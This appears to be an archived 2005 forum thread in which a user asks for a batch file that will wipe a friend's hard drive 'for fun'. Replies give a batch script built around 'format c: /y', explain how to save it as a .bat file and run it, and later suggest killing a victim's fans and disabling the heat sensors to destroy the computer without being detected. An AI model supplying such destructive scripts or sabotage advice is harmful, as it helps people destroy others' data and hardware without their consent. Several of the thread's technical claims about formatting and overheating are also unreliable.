PDA

View Full Version : Format batch

howardmeis
11-03-2005, 08:24 AM
What's the codeing for the file that you would just put on a CD or whatever, and then it formats the hard drive? Istn't it just like

y;
format c:

Or something like that? I just need it done for some fun on my friend kyle. lol.

Megaz
11-03-2005, 02:15 PM
I don't know if this is what you are talking about, but here:

Go to Command Prompt or MsDos and type in: Format C:
then it comes up with a message saying:

WARNING, ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST!
Proceed with format? (Y/N)?

Then you hit Y and yeah you can get the rest.

banana_sam
11-03-2005, 04:25 PM
Off topic:

Howard, your sig needs less emo, gay, text and fail.

gamepin126
11-03-2005, 08:23 PM
@echo on
title ZOMG FORMAT H4X!
echo Warning, this will format your computer automatically. Only one chance to turn back :s
cd:
format c: /y(Don't include this, but I forgot if it's forward or back slash)
echo Thank you for your time, here's a cookie.
end

Should work, but I probably forgot something. I haven't formatted in a while.

Megaz
11-03-2005, 08:43 PM
Hey gamepin, i'm kind of a noob at programming so one question. How would you put that on a cd, would you just write in notepad and would it work on a diskett too?

gamepin126
11-03-2005, 08:44 PM
Open up notepad, copy and paste that. And save it as XXX.bat It'll become a executable.

EDIT: This might help you figure out how to make it.
http://www.robvanderwoude.com/index.html

Megaz
11-03-2005, 08:58 PM
Ok I see, so then when I stick the CD/Diskett into the drive, the hard drive will wipe clean?

</edit> Thanks for the link.

gamepin126
11-03-2005, 08:59 PM
You have to run it first. Once it's ran, it'll do it automatically, I wouldn't want to test it on your main computer...Here, I added a pause, now you can play with your computer.

@echo on
title ZOMG FORMAT H4X!
echo Warning, this will format your computer automatically. Only one chance to turn back :s
Pause ZOMG I JUST SAVED UR LIFE, LEIK ZOMG!
cd:
end

Megaz
11-03-2005, 09:00 PM
Ok thanks for the help.

gamepin126
11-03-2005, 09:01 PM
edited post....

BloodyBlade
11-03-2005, 09:01 PM
Who the **** can't make a batch file? Well, I suppose that isn't a fair question; Who the ****ing can't figure out where to find help on batch files?
http://img377.imageshack.us/img377/2253/howardsucks8rx.jpg
Oh ****! That took less than two seconds as opposed to the 12 hours it took to recieve an answer from BWHacks.

Megaz
11-03-2005, 09:03 PM
anyways, i was reading the code and you posted that you can't remember if it is a forward or back slash.

JLTucker
11-03-2005, 09:03 PM
@echo on
title ZOMG FORMAT H4X!
cd:
end

LAWL. "ZOMG FORMAT HAX!" and "here's a cookie". RAWFL

gamepin126
11-03-2005, 09:04 PM
Magikmonkey should use this. He'll get a cookie at the end.

Megaz
11-03-2005, 09:21 PM
Thanks for the long explanation I think i figured it out now.

howardmeis
11-04-2005, 05:01 AM
Thanks gamepin, I just want this for future accessability since HDKP can actualy cause physical harm to a hard drive, and that wouldn't be good. lol. +2 reppzorz.

And magik, the text is from a song by slipknot, not some ****ty emo band like Hawthorn Heights.

gamepin126
11-04-2005, 04:14 PM
Thanks gamepin, I just want this for future accessability since HDKP can actualy cause physical harm to a hard drive, and that wouldn't be good. lol. +2 reppzorz.

And magik, the text is from a song by slipknot, not some ****ty emo band like Hawthorn Heights.
Only in like 2 cases, from like 4 years ago, did it cause physical harm. At least that's what I heard. And they weren't even from credible witnesses. I don't know, but would be right, if it flashed your hardware :evil:

howardmeis
11-07-2005, 02:07 PM
Well, it could easily do harm physicaly to a computer, think about having a 300 gig hd being formated in a matter of a few seconds. Think of all the **** it'd have to go through, including rapid heat up, and the spinner on it breaking. I don't know what the spinning thing is called..........

gamepin126
11-07-2005, 03:49 PM
Well, it could easily do harm physicaly to a computer, think about having a 300 gig hd being formated in a matter of a few seconds. Think of all the **** it'd have to go through, including rapid heat up, and the spinner on it breaking. I don't know what the spinning thing is called..........
I wonder if you can edit fan speeds with a batch file....That'd overheat someones computer, but you'd have to disable the settings that turn off your computer before it over heats.

howardmeis
11-07-2005, 04:04 PM
Well, are you talking about the fan, or the spin rate of the HD disk? If it's just a fan, they'd prolly notice, 'Hey, my fan isn't mkaing that buzzy noise (muine buzzes a bit)' and it'd take a while to overheat. And I have a fan on my graphics card, so my computer would take a bit more time to overheat.

BloodyBlade
11-07-2005, 04:16 PM
No, having a fan on your video wouldn't make a difference if there was no intake/exhaust fans on your computer. Blowing hot air into other hot hair won't do much other than keep the air hot. You obviously don't understand how computer air cooling works.

gamepin126
11-07-2005, 04:19 PM
Well, I mean, as far as physical damage. You could kill the fans, or slow them down to a deadly rate. Then turn off all the warning sensors so that the computer wouldn't detect the change in heat/fan speed. Then the victim's computer will slowly die. And it'll draw attention away from you, however you did it, either by sending a file to them, or by doing it yourself on their computer. It'll only meltdown when it gets used for a long period of time.